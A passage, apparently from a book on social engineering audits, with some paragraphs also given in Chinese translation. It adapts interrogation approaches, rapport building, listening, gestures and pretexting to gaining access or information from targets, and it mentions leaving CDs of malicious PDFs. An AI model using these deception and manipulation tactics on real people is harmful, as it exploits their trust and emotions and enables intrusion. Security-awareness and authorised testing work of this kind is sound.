You don’t have to learn how to do all this at the same time. The more practice you get actively listening and observing people the easier it becomes for you to do it without thinking.

 

Professional interrogation consists of a number of parts. The following sections discuss each one, in the context of how it pertains to a social engineer.

 

Positive Confrontation

 

In law enforcement positive confrontation doesn’t mean anything positive and good; on the contrary, it means the officer is telling the suspect he is the one who committed the crime; in other words, the officer is making a strong accusation. In a social engineering audit, though, you already have identified the “target” you want and now you are going to tell (maybe using the NLP tactics previously mentioned) that target that he will do what you are asking of him.

 

You confront the target with the objective of starting him on the path to doing what you want. For example, a social engineer may approach the receptionist and ask, “Is Mr. CEO in? I have a meeting with him.” Or, to use a positive-confrontation angle, “I am here for my meeting with Mr. CEO at 11 am.” Notice the second example positively states the meeting as being set, expected, and in such a way that you are sure it is happening.

 

Theme Development

 

Theme development in police interrogations is when the interrogator develops a story to postulate why the suspect may have committed a crime. Many times that story is relayed to the suspect during the interrogation. “So he insulted you and you got so mad, you grabbed the pipe and began hitting his windshield with it.” While the officer is telling the story, he or his partner is watching the body language and microexpressions of the suspect to see if there are any clues that would constitute agreement.

 

Although social engineers can use this method, I also like to state that from a social engineering viewpoint, theme development needs to be seeing your pretext from the eyes of the target. What would a “tech support rep,” “manager,” or “fellow employee” look like, say, and do? How would he act?

 

Theme development for social engineers is when the supporting evidence you display feeds directly into the theme of who you are portraying. Your approach to a target, whether on the phone or in person, often involves a pretext of some sort. The pretext, of course, supports your storyline or theme. This part of the interrogation is where you offer reasons or support for the pretext (see Chapter 4 for a refresher on pretexting).

 

For example, in one audit my pretext was very simple—I was just an employee who belonged. Armed with a trade publication I found in the trash, I followed a few employees through the door and past the security guard. As we approached the security guard I began a very simple conversation with one of the employees about an article in the journal. All of my actions contributed to theme development. Your goal is to give the people who would normally stop you justification for not doing their job.

 

The more you fit in, the less you stand out, and the easier it is for security guards and the like to justify not stopping you and letting you in.

 

Handling Denials and Overcoming Objections

 

Whether on the phone or in person, what is the plan of action if you are denied access to the place or information you are seeking? I like to call these conversation stoppers. People use them with salespeople all the time, “I’m not interested.” “I don’t have time right now.” “I was just leaving….”

 

Whatever flavor of stopper targets throw out, you must have a plan to overcome it and handle the denial of access. I like to preemptively dismiss objections if I feel the situation warrants.

 

When I was in sales, I worked with a man named Tony who had a tactic that involved knocking on a door and introducing himself, and without pausing saying, “I know you might want to say you are not interested, but before you do, can you answer this one question: Is five minutes of your time worth $500?”

 

此时,对方不太可能说“我不感兴趣”。通过减少拒绝的可能性并提出问题,托尼能够让目标除了反对之外还考虑其他事情。

At this point, the person was much less likely say, “I’m not interested.” By diminishing the possibility of denial and following up with a question, Tony was able to get the target to think about something else besides her objection.

 

在社会工程活动中,你不能走到保安面前说:“我知道你不想让陌生人进门,但是……”因为这会引起太多的怀疑。使用这种方法来克服反对意见对社会工程师来说要复杂得多。

In a social engineering engagement you can’t walk up to the security guard and say, “I know you don’t want to let strange people in the door but…” because it would raise way too much suspicion. Using this methodology to overcome objections is much more complex for social engineers.

 

你必须考虑可能出现哪些反对意见,并组织好你的主题、故事、服装和人物来预先消除这些反对意见。然而,当反对意见出现时,你仍然需要有一个好的答案。你不能直接跑出门或挂断电话。一个好的退出策略可以让你稍后再回来进攻。

You have to think about what objections might arise and organize your theme, story, dress, and person to pre-empt those objections. Yet you still have to have a good answer to give for when objections come up. You can’t just run out the door or hang up the phone. A good exit strategy enables you to come back to attack later on.

 

退出策略可以很简单,例如:“好吧,女士,很抱歉您不让我去见史密斯先生。我知道他会非常失望,因为他一直在等我,但我稍后会给他打电话并安排另一个约会。”

An exit strategy can be as simple as, “Well, ma’am, I’m sorry you won’t let me in to see Mr. Smith. I know he will be greatly disappointed because he was expecting me, but I will give him a call later and set up another appointment.”

 

吸引目标的注意力

Keeping the Target’s Attention

If you handled your social engineering move correctly up to this point and you are in front of the target, then the target may start to think about what would happen if she does not allow access, take the file, or do what you are asking. You need to feed off of that inherent fear and use it to continue to move the target to your goal.

A few short statements can do this, such as, “Thank you for your help. I was so nervous about this interview that I obviously put the wrong date down in the calendar. I hope that Mrs. HR Manager is some place warmer than here?” Allow for a response, then continue, “I want to thank you for your help. When will she be back so I can call to make another appointment?”

Presenting an Alternate Route

When you are interrogating the target in a social engineering audit, the possibility exists that your first path will not be greeted with smiles, so having a lesser but just as effective path of action ready is a good idea.

Maybe you have used all these tactics to try to get Sally, the receptionist, to let you in to see Mr. Smith. The tactics are all failing and you are being shut down. You should have an alternative path prepared, such as, “Sally, I appreciate you have to make sure things are done by appointment only. I am just not sure when I will be back through the area. Can I leave you with this CD of information for Mr. Smith and then I can follow up with a phone call tomorrow to see whether he will set up an appointment?”

Having a few CDs prepared with some maliciously encoded PDFs can help to make this path a reality, as can having practiced interrogation tactics so that you can use them quickly.

A contact of mine sent me a document titled “Interview and Interrogation” that the Department of Defense uses to train employees to pass polygraph tests. It outlines the different approaches used by professional interrogators, which I present here. By studying these different approaches we can learn many different methods that may be meaningful for social engineers.

  • Direct approach: The interrogator assumes an air of confidence in this approach. The attitude and manner of the interrogator rules out that the suspect is innocent at all. Without threatening, the interrogator disarms the suspect by telling him anyone else would have done the same thing.

As a social engineer, you can utilize this approach depending on your pretext. Maybe you are management, a consultant, or another person who has power over the target. This means you must have an air of confidence and assume that the target “owes” you the response you seek.

  • Indirect approach: The suspect is allowed to tell his side of the story in detail and the interrogator looks for omissions, discrepancies, and distortions. The interrogator’s job is to let the suspect know that the best course of action is to tell the truth.

As a social engineer you can use this approach by not approaching the target in any role, but maybe as an elicitation, a question designed to elicit information from the target. The social engineer can gather information from the target by letting him do most of the talking.

  • Sympathetic approach: The DOD manual offers some excellent thoughts on this approach. The interrogator drops his voice and talks in a lower, quieter tone that gives the impression he is an understanding person. He sits close to the suspect and maybe puts his hand on the suspect’s shoulder or pats him on the arm. Physical contact at the right time is very effective.

The social engineer can use this approach in the very same manner as the interrogator. Maybe you overhear some employees complaining about the boss as you are waiting to tailgate in the door. Or maybe you have followed the target to the local bar and get into a conversation where you can show empathy to a situation. You can use this approach all around, and it is very effective.

  • Emotional approach: This approach plays on the morals or emotions of the suspect. Questions such as, “What will your wife or kids think about this?” are used in this interrogation tactic. The thoughts that are aroused emotionally upset him and make him nervous; as these emotions manifest themselves, the interrogator can capitalize on them.

You can use this approach in a similar manner to the preceding, in which you play on a weakness identified in the target. In one engagement, I knew the target was partial to charities for children who suffer from cancer. Playing on those emotions I was able to get the target to take an action he should not have taken, and it compromised his operation.

  • Logical approach: This non-emotional approach presents strong evidence of guilt. The interrogator should sit erectly and be business-like, displaying confidence.

You can use this matter-of-fact approach when presenting evidence of your legitimate reasons for being present—for example, being dressed and armed as an IT repairman and having the air of confidence that you belong there.

  • Aggressive approach: For an interrogator, a fine line exists between gathering information and infringing on the target’s rights that must not be crossed. The voice should be raised, and the look and act should be aggressive, but the suspect’s civil rights should never be violated.

The social engineer auditor needs to keep this fine line in mind. As in the case of Hewlett-Packard, discussed in Chapter 4, being hired to social engineer a company does not give you the right to break civil laws. Most of the time the company hiring you has no right to allow you to tap home phones, read personal e-mails, or invade people’s privacy.

  • Combination approach: One interrogator may combine two approaches to have maximum effect. This would be decided upon based on the suspect’s personality.

As a social engineer you may use the same technique—combine your attacks and approaches for maximum effect. For instance, after you discover some personal details about a target—such as their favorite local bar—you can approach the target and start a conversation. Such a tactic, especially when employed in a relaxed atmosphere, can go a long way toward opening people up.

  • Indifferent approach: This approach is very interesting because the interrogator acts as if he does not need the confession because the case is solved. At that point the interrogator may try manipulating the suspect into giving his side of the story.

As a social engineer you may not be able to use this approach unless caught. If you’re caught in an area or situation you should not be in, you can act indifferent instead of afraid that you are caught. Acting indifferent can cause the person who caught you to not be alarmed as much and afford you an opportunity to dispel any worries. Kevin Mitnick (see Chapter 8 for more on Mitnick) was great at this technique. He had the ability to think quickly on his feet. Also, acting indifferent when he was in a precarious situation allowed him to get away with a lot.

  • Face-saving approach: The interrogator should rationalize the offense, giving the suspect a way out and an excuse to confess and save face. An interrogator should not make the excuse so good, however, that the suspect can use it in court as a defense.

A social engineer can really utilize this approach. An interrogator does not want to give someone too good an excuse, but a social engineer does. You want the excuse to be so good the target doesn’t even need to think before rationalizing it as an excuse for complying with you.

One approach is to say a higher-level person asked you to be there. You can follow this up by saying, “I can understand how you might feel now, but I don’t even want to imagine how upset Mr. Smith will be if I don’t fix that massive e-mail blunder before he returns on Monday.” This approach gives the target the ability to save face and comply.

  • Egotistical approach: This approach is all about pride. For it to work you need a suspect who is very proud of an accomplishment. Bragging on good looks, intelligence, or the way the crime was performed may stroke his ego enough that he wants to confess to show that, indeed, he was that smart.

In social engineering gigs this method is often used. Playing up someone’s accomplishments gets them to spill their deepest secrets. In the case of the U.S. nuclear engineer in China (refer to Chapter 3), social engineers loaded the man with compliments, and he spilled the beans and divulged information he shouldn’t have.

  • Exaggeration approach: If an interrogator overexaggerates the case facts, the suspect may admit to what was real. One example would be if an interrogator accuses a thief of wanting to commit rape and saying, “Why else would someone break into a bedroom in the middle of the night?” This often causes the suspect to admit to only wanting to steal and not commit rape.

You can also use this approach by overexaggerating the task you are there to perform. By overexaggerating the reason for being there you can give the target a reason for providing you lesser access. For example, you can say, “I know Mr. Smith wanted me to fix his computer personally because he lost a lot of data, but if you don’t feel comfortable with that, I can potentially fix his problem from another computer in the office.”

  • Wedging the alibi: A suspect seldom confesses his transgressions all at once. Getting him to make minor admissions, such as he was on the site, owned the weapon in question, or owned a similar car, can move him toward admitting more and more, eventually leading to a complete confession.

Maybe you get stopped at the door during a social engineering gig and the gatekeeper refuses you access to the building. See whether you can “gain access” by using a line like this: “I understand Mr. Smith is busy and can’t meet with me. Would you mind giving him this CD of information about our products and I will follow up with a phone call later on today or tomorrow?”

It is a lesser admission, but it nevertheless gets something in the door: if not you, then one of your tools.

The End Goal

To prepare to use proper interview or interrogation tactics, as a social engineer you may want to answer a few questions of your own. I encourage you to write these down in a notepad because doing so can help you prepare for your encounter with the target. Plus, writing down your answers makes them real and gives you a path to work on during the preparation for your interrogation.

Answer these questions:

  • Who: With whom is the interrogation or encounter being conducted? What role does he play? List names, titles, and other information about him that is relevant to the interrogation.
  • What: Exactly what preparation has been done and what is going to be your goal during the interrogation? You must have a definite aim.
  • When: What is the timeframe of the interrogation? What time of day or night? What are the circumstances at the business that lead to this decision about when to make your move? Is there a party you overheard about? Is it a time when a large portion of the employees are on vacation? Is it during lunch time? Is it during the changing of the security staff?
  • Where: What is the location of the interrogation? Are you going to be at the target’s location? Are you tracking the person to his or her gym, local bar, or daycare? Where is the best place to try to obtain the information you need from the target?
  • Why: People hear this question often enough from their kids, but it must be asked. What is the purpose of this interrogation? To make the target admit to the location of something? To make him give out information he should not? For you to gain access to a room or a server?
  • How: What methods will you use in this interrogation? NLP? Embedded commands? Human buffer overflow (discussed at the end of this chapter)? Microexpressions?

Of course, in a criminal interrogation the goal is confession to a crime. With interrogation as a social engineer the goal is a confession of a different sort. You want people to feel comfortable giving you information, and using the interrogation tactics discussed earlier you can make that easier to do. In the end, your social engineering interrogations should be like smooth interviews. However, a social engineer can use some other techniques to help while using interview and interrogation tactics on a target.

Gesturing

Gestures have a wide variation due to the fact that they are very much culturally dependent. Unlike microexpressions, which are universal, gestures from the United States can actually be insulting in other parts of the world, or have no meaning at all.

Here is an exercise to help you better understand gesturing differences. If you want you can write down your answers to refer to in a few minutes. Depending on what culture you’re from, the answers will be interesting to see.

Write down what you think this gesture means and whether it is rude in each case:

1. Holding your palm facing upward, point at someone with your index finger and beckon to him.

2. Make a “V” sign with your index and middle fingers.

3. Sit with the soles of your feet showing.

4. Make the “ok” symbol with your fingers.

5. Wave a hand with your palm facing outward.

6. Nod your head up and down.

If you wrote down your answers, compare them to some of the following interesting cultural differences:

1. In the U.S. this gesture simply means “Come here,” but in the Middle or Far East, Portugal, Spain, Latin America, Japan, Indonesia, and Hong Kong, beckoning someone this way is considered rude or insulting. Beckoning someone with the palms facing down and using all the fingers to beckon is more acceptable.

2. In the U.S. this gesture is a “peace sign,” but in Europe it means “victory.” If you put the palm toward your face it actually means, “Shove it.”

3. In the U.S. this is a comfortable way of sitting and doesn’t denote any bad intent. Yet in other countries, such as Thailand, Japan, and France, as well as countries of the Middle and Near East, showing the soles of the feet demonstrates disrespect. Exposing the lowest and dirtiest part of your body is insulting.

4. In the U.S. this gesture means everything is okay. But in other parts of the world it has much different meaning. In Brazil and Germany it is an obscene gesture, in Japan it means “money,” and in France it means “worthless.”

5. In the U.S. this is a greeting, a way to say hello or good-bye. In Europe it can mean “no,” and in Nigeria it is a serious insult.

6. In the U.S. nodding your head is a way of saying “yes.” The same is true for many places, but in some areas, such as Bulgaria or Greece, it is a way of saying “no.”

These are just a few examples of gestures that can have varying meanings depending on where you are or who you are talking to. Understanding the different meanings of gestures is important because communication is often much more than what is said.

This section is intended to show that, during an interaction with a target, not only can these principles be observed but they can also be utilized to manipulate the target into a path of least resistance. Understanding the culture of the targets you approach will also keep you from performing a gesture that can have undesirable results.

Anchoring

Gestures can have some powerful effects when used properly. Some of these principles come from the study of NLP but can have a lot of power when you’re trying to set your target’s mind on a path you control.

One such method is anchoring, which is a method of linking statements of a like kind with a certain gesture. For example, if you are talking to a target and he describes something positive and good, you can repeat it back while gesturing with your right hand only. If it is something bad you can gesture with your left hand only. After doing this gesture a few times you begin to “anchor” in your target’s mind that right-handed gestures are linked to good things.

Salespeople use this method to further solidify that “their product” or “their service” is excellent and the competitor’s is not. Some politicians use this method to anchor positive thoughts or thoughts they want their audience to think of as positive with certain gestures. Bill Clinton was a great example of someone who understood this. To see this in action (albeit not former President Clinton) visit www.youtube.com/watch?v=c1v4n3LKDto&feature=player_embedded.

Mirroring

Another tactic when it comes to gestures is called mirroring, where you try to match your gestures to the personality of the target. Of course, this is not as easy as it sounds. But what can you discern about the target from just observation? Is she timid? Is he loud and outgoing? If you approach a timid person with large, loud gestures you will surely scare her off and potentially ruin your chances of making your social engineering attempt. By the same token, if you are more timid you will need to mirror “louder” gestures when dealing with “louder” people. Mirroring not only involves mimicking a target’s body language but also using gestures that make it easy for a person to listen to you.

You can take this principle to another level. Seeing gestures a target is familiar with can be comforting to him or her. However, you must strike a careful balance, because if your target has a particular gesture he seems to be using a lot and you use it exactly the same way, then you run the risk of irritating him. You want to mirror him, but not exactly. If the target ends a thought by placing his hand on his chin you can end a thought by placing your hand on another part of your face or raise a finger to tap your chin a couple times.

The following section analyzes the topic of gesturing a bit further by discussing the importance of the position and placement of a target’s arms and hands.

Arm and Hand Placement

Law enforcement officers are trained to notice the placement and position of the arms and hands during both interviews and interrogations. An increase in movement or “fidgeting” during an interrogation can show an increase in stress levels, signifying that the interrogation is having the desired effect. This is, of course, in a law enforcement setting; in a social engineering setting you would watch for these same signs, but signs of stress in the target might indicate you need to back off (unless your goal is to stress him or her out).

Certain law enforcement officers are taught to pay attention to a couple of signs:

  • Elbows generally hang free next to the body when a person is relaxed. When you feel threatened or scared your body’s natural reaction is to pull the elbows in towards the rib cage. In essence this position serves as a layer of protection to one’s internal organs that might be threatened.
  • Hand gestures often can be very revealing, too. A target may describe something with his hands that he doesn’t say. For example, in a crime interrogation suspects may make a gesture that describes the activity (that is, strangling, shooting, stabbing, and so on) but just say the word crime or incident. Watching for the subtle hand gestures your target may use is important.

Taking note of signs that the target is feeling threatened or scared can help you to adjust and put them back at ease. When you approach a target, much can be said with body language and arm and hand gestures before the first word is even spoken.

Other gestures to take notice of include:

  • An open palm might indicate sincerity.
  • Steepled fingers could indicate the person feels authoritative.
  • Tapping or drumming fingers can indicate anxiety.
  • Touching the face can indicate thought; touching hair can indicate insecurity; and touching ears can indicate indecisiveness.

Taking note of these gestures in your target can tell you a lot about his mindset. On the other hand, performing these gestures can help you to portray one of these images if this is your pretext.

From a social engineering standpoint here are a few key points about gestures, which can be imperative if you are a “big” gesturer like me:

  • No one should remember the gesture, but only the message attached to it. If people tend to say, “Wow, that guy gestures a lot” you need to calm down a bit. The message is important, not the gesture.
  • Avoid monotony. Even in gestures you can be so bland, boring, and repetitive that the gesture can adjust the target’s perception of you to be negative.
  • Be very concerned about exhibiting anxiety, such as tapping or drumming your fingers or making jerky movements. They tell the target you are nervous and detract from your message.
  • Too much is too bad. Overgesturing can also detract from your message.

Remember that using facial expressions, gestures, and posture is a package deal. They must all blend together, be balanced, and support your pretext.

As good as all this information is, one tool in the interrogation arsenal can make or break the way you use this knowledge in your social engineering skills.

Listening Your Way to Success

Probably no single skill is as all-encompassing as listening. Listening is a major part of being a social engineer. What you have to realize is that a major difference exists between hearing and listening.

It is commonly believed that people retain much less than 50% of what they hear. That means if you are talking to a person for ten minutes he will remember only a few minutes of what you said. Although people eke through life this way, it is not acceptable for a social engineer.

Often the little things that are said can make or break how successful you are in a social engineering endeavor. This area is where massively improving your listening skills comes in, and not just listening to what is said, but how it is said, when it is said, and with what emotion. All of these factors contribute to your perception of the information relayed.

Being a good listener might sound easy, but when you are in the heat of the moment, your end goal is to gain access to the server room, and you are listening to a story by a few employees out for a smoke break who you plan on following into the building, truly listening can be hard.

 

然而,正是在这些时候,你可能想要认真倾听。也许苏珊开始抱怨人力资源经理琼斯先生。她讲述了他最近对她有多不礼貌,以及她对此有多厌烦。然后她的烟友贝丝说:“你应该来会计天堂看看。那里也充满了混蛋。”

Yet it is during these times you might want to really listen. Maybe Susan starts to complain about her manager in HR, Mr. Jones. She tells a story about how short he has been with her lately and how she is fed up with it. Then her fellow smoker, Beth, says, “Well you should come over to the paradise of accounting. It is filled with jerks there, too.”

 

也许这听起来就像两个疲惫不堪、怒不可遏的员工在抱怨。或者不止如此?你知道他们的名字、经理的名字、他们所在部门的名称,以及一些员工的一般行为举止。如果你需要证明自己在大楼内的合法性,这些信息以后会非常有用。

Maybe this just sounds like the complaining chatter of two tired and ticked-off employees. Or is it more? You have both of their names, the name of a manager, the names of their departments, and some idea of the general demeanor of some of the employees. This information can be very valuable later on if you need to provide proof of your validity for being inside the building.

 

通常,一个人说话的方式可以告诉你很多关于这个人的信息,但要运用这一点需要大量的倾听。这个人是生气、悲伤还是快乐?她的语速是加快了还是放慢了?他情绪激动还是情绪消退了?有时,关注这些事情比只听单词能告诉你更多。

Often the way someone says something can tell you a lot about the person, but applying this will require a lot of listening. Is the person angry, sad, or happy? Did she speed up or slow down in her delivery? Did he get emotional or did his emotion trail off? Paying attention to these types of things can tell you a lot more than the words at times.

So how can you become a great listener?

The following steps can help you perfect your listening skills. These tips can assist you not only in social engineering but also in life, and when applied to a social engineering audit can make a world of difference.

1. Pay attention. Give your target your undivided attention. Do not fiddle with your phone or other gadget. Do not drum or tap your fingers. Try to focus intently on what is being said, looking at the person speaking. Do this in a very inquisitive way, not in a scary, “I want to stalk you” way.

Try hard not to think ahead and plan your next response. If you are planning your next response or rebuttal you will not be focused, and you may miss something important or give the target the impression you don’t really care. This can be very hard to control, so perfecting this tendency will take some serious work for most people.

Also try not to be distracted by environmental factors. Noise in the background or a small group laughing about something can shift your focus; do not allow that to happen.

Finally, pay close attention to what the speaker is not saying, too. The body language, facial cues, and other aspects of communication should be “listened” to intently.

2. Provide proof that you are listening. Be open and inviting with your body language and facial expressions. Nod once in a while, not too often, but often enough to let the target know you are there. You don’t want to look like a bobble head doll, but you want to let the target know you are “with him.”

Don’t forget the all-important smile. Smiling can tell the target you are with him mentally and you understand what he’s saying. As with paying attention mentioned earlier, add small smiles when appropriate. If the person is telling you her dog just died, nodding and smiling will most likely get you nowhere.

3. Provide valuable feedback. Letting your personal beliefs and experiences filter the message coming your way is all too common. If you do that you may not truly “hear” what the speaker is saying.

Be sure to ask relevant questions. If she is telling you about the blue sky, asking “So how blue was the sky?” will not be effective. Your questions must show you have been actively listening and have the desire to gain a deeper understanding.

Every now and then mirroring or summarizing what you have heard can work well, too. Don’t recite the conversation like a book report, but recapping some of the main thoughts can help the target see you are in tune with the message.

4. Do not interrupt. Not much more needs to be said on this tip. Interrupting your target shows a lack of concern for his feelings and stops the flow of thoughts. Letting him finish and then speaking is better.

However, circumstances do exist where interrupting can be useful or even a tactic. If you want to see an example, watch the movie Sneakers. When Robert Redford is trying to gain access to a locked door that he must be buzzed into, he interrupts the doorman in a heated dispute over some delivery items. He does so a few times, eventually frustrating the doorman and causing him to unlock the door with no authorization. If you think it will get you somewhere, interrupting might be a good idea. Most of the time, however, it is not.

5. Respond appropriately. This is the pinnacle of good or bad listening skills. If you were focused on your rebuttal or next statement, or you were thinking about the very attractive blonde that just walked by, you might put your foot in your mouth.

I was once training a group of people and was telling them some aspects of very detailed manipulation tactics. I could tell two guys were not listening. I put in a random thought like, “So then you bake the lion at 350 degrees for 15 minutes til crispy.” The rest of the group broke out in laughter and I turned to one of the two and said, “What do you think, John?” He responded with a blank stare and a stuttered, “Um, yah, sounds perfect.”

Do not ever do that to a target. It is a death blow to rapport (discussed later in this chapter). Be respectful, keep your emotions in check, and respond appropriately at all times when conversing with a target.

Paying attention, providing proof, giving positive feedback, being careful to never interrupt, and responding appropriately can make or break you when it comes to listening. They especially come into play during extended social engineering engagements, such as when I had to interact with the gentleman at the Chamber of Commerce social gathering by “meeting” him at the bar and then talking to him about his business. Much of the information I was seeking would have been divulged in normal, mundane conversation. Make sure you practice these tips at home or the office before the time comes for the conversation to take place. You want good listening to become second nature as part of your arsenal of talents, not something you have to think about.

Your own emotions are another aspect of listening you must take into account. For example, I was raised in a strict, religious Italian family. I was taught that you didn’t disrespect women, and I shudder to tell you of the one time I called my mom a disparaging name. I will tell you that it did not end too well for me. One day many years after that incident, I was working an engagement and was talking with a guy from whom I was trying to obtain some information. I approached him in a social setting and we started a conversation. He started to talk about a woman he worked with, in a very inappropriate way. Being raised the way I was, I found a lot of anger boiling up inside me. I had a hard time containing those feelings and it must have shown on my face and in my body language, leading to that particular vector being blown. In that failure I learned a very valuable lesson—when it comes to listening during social engineering engagements, you must try your hardest to not let the built-in filters you have get in the way.

Also, remember to react to the message, not the person. If you don’t agree with a person’s beliefs or stance, affording him or her dignity will go a long way in making that person feel comfortable with you. Even in situations where you might not agree you can find something empathic to say. For example:

Target: “This job stinks. They make me work this horrible shift and for low pay, too.”

SE: “It sounds to me like you are overwhelmed by your situation here.”

Although you might be thinking “Try Harder,”™ by responding this way you let the target know you were listening, as well as empathizing with her plight in life.

This technique is known as reflective responding. Reflective responding has some basic principles to it:


  • Listen actively, as described earlier.
  • When it’s time to respond, be aware of your emotions. Knowing what you feel as the target is speaking can help you to react properly.
  • Repeat the content, not like a parrot, but in your words.
  • Start your response with a non-committal phrase such as, “It sounds like,” “It seems like,” or “It appears that.” These phrases ease the message you are trying to deliver. If you need proof of this, the next time you get into an argument with your mate, boss, parents, or whomever say, “You are mad at me because…” and compare the person’s reaction with what you get when you say “It appears you are mad because of…” instead. You will see which one is taken better.

Reflective responding used with active listening is a very deadly force in the trust and rapport-building skills arena.

As you learn to listen better and it becomes part of your nature you will enhance your ability to react to the message you hear. A social engineer’s goal is to gather information, gain access to someplace or something you should not have access to, or cause the target to take an action he should not take. Thinking that you must be perfect at manipulation often stops people from learning and practicing great listening skills, but this is the exact reason you need to be a great listener.

Consider these two scenarios:


  • One of your neighbors comes over and asks whether you have time to help him with a project in his garage for about an hour. This neighbor has a dog that has gotten into your garbage a few times and tends to like to use your yard as a bathroom. You are just about to sit down to relax at the end of a long day and watch some TV or read a book.
  • Your childhood friend comes over and tells you that he needs some help moving some furniture. He just got a place about five miles from you and he can’t get the couch up the stairs. You are just about to sit down to relax a bit.

For which scenario are you more likely to put aside relaxing? Most people will put aside relaxing for the second scenario, but will come up with an excuse or reason to not help out in the first scenario or at least try to postpone it to another day when they are not “busy.”

Why? People are very open and free with friends. When you feel comfortable with someone, you have no boundaries and will put aside your own wants and needs at times to help them out. One naturally trusts the message coming from a friend, whereas with a stranger one might start to second-guess what’s being said, trying to determine whether it is truthful or not. In the case of the relationship with the friend, this connection is called rapport.

For years rapport has only been talked about when it comes to salespeople, negotiators, and the like. Rapport isn’t just for salespeople; it is a tool that anyone can use, especially the social engineer. If you are wondering how to build rapport instantly, then read on.

Building Instant Rapport

My former coworker, Tony, used to say that building rapport was more important than breathing. I don’t really believe that to be true, but it does have a ring of truth in that rapport building is vital.

Wikipedia defines rapport as, “One of the most important features or characteristics of unconscious human interaction. It is commonality of perspective: being ‘in sync’ with, or being ‘on the same wavelength’ as the person with whom you are talking.”

Why is rapport discussed in this chapter? It is a key element in developing a relationship with any person. Without rapport you are at an impasse. Within the psychological principles behind social engineering, rapport is one of the pillars.

Before getting into the aspects of how to use rapport as a social engineer you must know how to build rapport. Building rapport is an important tool in a social engineer’s arsenal.

Imagine that you could make people you meet want to talk to you, want to tell you their life story, and want to confide in you. Have you ever met someone like that, someone you met only recently but with whom you feel totally at ease sharing very personal things? Many psychological reasons may play into why that is, but it may simply be that you and that person had good rapport.

The following sections outline important points about building rapport and how to use rapport in social engineering.

Be Genuine about Wanting to Get to Know People

How important are people to you? Do you enjoy meeting new people? It is a mindset about life, not something that can be taught. The prerequisite to building rapport is liking people. People can see through a fake interest.

To be a good social engineer and to be able to use rapport, people need to be important to you. You must like people and enjoy interacting with them. You have to want to learn about people. People can see through fake smiles and fake interest. Developing a genuine interest in your target can go a long way toward building rapport.

Take Care with Your Appearance

You cannot change some things that may affect your interaction with others. Unfortunately, people can still hold your skin color, gender, or age against you before you facilitate any interaction. You can’t control those things, but you can control aspects of your appearance such as clothing, body odor, and cleanliness, as well as your eye contact, body movements, and facial expressions. I read a statement once that I have seen proven true too many times to ignore: “If a person is not comfortable with himself, others will not be comfortable with him either.”

Be aware of your pretext and your target. If your pretext is the janitor, make sure your demeanor, dress, attitude, and words reflect someone in that position. If your pretext is a manager of a business, then make sure you act and dress appropriately. This takes research, but nothing kills rapport more easily than not looking the part. Your goal in some instances is to keep people in the autopilot mode that will let them not question you. Having your dress, grooming, or demeanor out of place removes the target from autopilot and hurts your chances at success.

Be a Good Listener

See the earlier section for more details. The importance of good listening can’t be overstated.

Whether you are trying to make a friend or make a social engineering move, listening is a skill you need to master.

Be Aware of How You Affect People

One time I saw an older woman drop an item as she left a grocery store. I picked it up and followed her out to the parking lot. By the time I caught up with her she had her trunk open and was loading groceries into her car. I came up behind this short, little elderly woman and with all 6’ 3” of me looming over her said, “Excuse me, ma’am.” I was obviously too close for her comfort and when she turned around she screamed out, “Help! He’s trying to mug me. Help!”

I obviously needed to think about how my presence might affect this woman during my interaction with her. I should have realized that an elderly woman all alone in a parking lot who was not expecting a huge man to walk up behind her might freak out. I should have come around and approached her from a different angle.

Be aware of how your appearance and other personal aspects might affect those you will be in contact with. Do you need a breath mint? Make sure no food is on your face or in your teeth. Try to be relatively sure that nothing is glaring in your personal appearance that will turn the person off.

UCLA Professor of Psychology Albert Mehrabian is known for the 7-38-55 Rule, which states that only 7% of normal communication lies in the words we say, whereas much more lies in body language and vocal tone. Try to be aware of yourself, but also pay attention to the first few seconds of interaction with a person. His or her reaction to your approach can tell you whether you possibly missed something, or whether you need to change something to be more effective.

As a social engineer, be aware of how you affect people. If your end goal is all that is on your mind you will affect the people you come into contact with negatively. Think about how your appearance, words, and body language may affect your target. You want to appear open and inviting.

Keep the Conversation off Yourself

We all love to talk about ourselves and even more so if we feel we have a great story or account to share—it is human nature. Talking about yourself is one way to kill rapport. Let the other person talk about himself until he gets tired of it; you will be deemed an “amazing friend,” a “perfect husband,” “great listener,” “perfect sales guy,” or whatever other title you are seeking. People feel good when they can talk about themselves; I guess we are all a little narcissistic, but by letting the other person do the talking you will leave that interaction with his liking you a lot more.

Keep the conversation off yourself. This point is especially cogent for social engineers. You have a definite goal in mind and sometimes your judgment and direction can be clouded by what “you” want. Taking that focus off of the target is dangerous as far as success goes. Let targets talk about their jobs, roles, and projects, and be amazed at how much information they release.

Remember That Empathy Is Key to Rapport

Empathy, defined by Random House Dictionary as “the intellectual identification with or vicarious experiencing of the feelings, thoughts, or attitudes of another,” is lacking in many people today and is especially hard to feel if you think you have the solution to someone’s problem. However, really listening to what someone is saying, trying to identify and understand the underlying emotions, and then using reflection skills can make a person feel as if you are really in tune with him.

I felt it necessary to provide the definition of empathy because understanding what it is you have to do is important. Notice that you must “intellectually identify” with and then experience “the feelings, thoughts, or attitudes” of someone else.

These aren’t always serious, depressing, or extreme emotions. Even understanding why someone is irritated, tired, or not in the best mood can go a long way. Imagine you go to the bank drive-through and the teller lady gives you a monster attitude because you forgot to sign your check and she now has to send it back. You also forgot a pen and need to ask her for yet another favor. Your reaction might be similar to mine, especially if she gave you the eye roll and the irritated glance—you want to tell her that she is here to serve you. Instead, try saying this: “It appears you might be a little irritated. I understand that; I get irritated when I have to deal with my forgetful clients, too. I hate to ask this, but could I please get a pen?”

It’s important to not be patronizing when attempting to show empathy. If your empathy seems to come off haughty or arrogant, you can make the target feel like you are patronizing them.

You acknowledged her being upset but without accusation, showed that you have the same feelings, and then made a request. Empathy can go a long way toward building rapport; one caveat is that rapport cannot be faked. People need to feel you are genuinely concerned to build that trust relationship. If you are not a natural at displaying empathy, then practice. Practice with your family, friends, coworkers, teachers, or classmates. However and wherever you do it, practicing being empathetic will greatly improve your relationship-building skills.

Empathy is a tool of the social engineer. Unfortunately, it is also used often in malicious social engineering. When a catastrophe hits somewhere in the world, a malicious social engineer is often there to “empathize” with you. What probably makes this tool so easy for malicious social engineers to use in many cases is that they truly are from bad, poor, or impoverished places. Being in bad straits themselves makes appearing empathetic to others’ plights in life easy and therefore creates rapport automatically.

Nothing builds rapport more than when people feel like you “get them.” This proves very true when someone is a victim of disaster. It’s a scary thought, but those who have been victims of abuse, crime, rape, natural disasters, war, or other atrocities on earth often can “understand” the feelings of those who are experiencing them. This opens victims up to trusting the wrong type of people if that rapport is built.

